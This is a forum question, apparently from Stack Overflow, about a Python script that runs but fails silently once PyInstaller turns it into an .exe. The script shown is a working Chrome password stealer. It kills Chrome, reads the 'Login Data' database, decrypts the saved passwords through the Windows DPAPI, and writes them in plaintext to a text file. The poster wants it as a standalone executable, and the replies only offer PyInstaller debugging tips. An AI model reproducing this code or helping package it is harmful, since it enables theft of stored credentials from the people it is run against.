# Can't run the script as .exe but It runs properly as py file

Tags: python, pywin32

I downloaded pyinstaller in order to turn my python scripts into an executable program. When I run my code as python file there is only one mistake on the third line `import win32crypt` and it is showing this `'error unresolved import 'win32crypt'` but it works properly. 
But when I convert my script to application (.exe file) It doesn't work (Without any error message). My script is made to copy from Google Chrome email/password and after that to paste those information into an txt file.

I have already install pywin32 from console with this command: `pip install pywin32`.\

**This is my code**.

```
import os
import sqlite3
import win32crypt

f= open("logins.txt","w")

def closeChrome():
    os.system("taskkill /im chrome.exe /f")
def connectDb():
    dBpath=os.path.expanduser("~")+r'\AppData\Local\Google\Chrome\User Data\Default\Login Data'
    connectionObj=sqlite3.connect(dBpath)
    cursorObj=connectionObj.cursor()
    statement="SELECT origin_url,username_value,password_value FROM logins"
    cursorObj.execute(statement)
    data=cursorObj.fetchall()
    for url,username,password in data:
        password=win32crypt.CryptUnprotectData(password)
        f.write(f"url: {url},  username: {username},  password: {password[1].decode('utf-8')}\n")
        print(f"url: {url},  username: {username},  password: {password[1].decode('utf-8')}\n") 
        print(".................................")


closeChrome()    
connectDb()
```

Thanks :)

Comment: Please use pyinstaller again without parameter ``-w`` then the console will show you error.

Comment: I don't convert the file with -w inside..... My command was `pyinstaller file.py`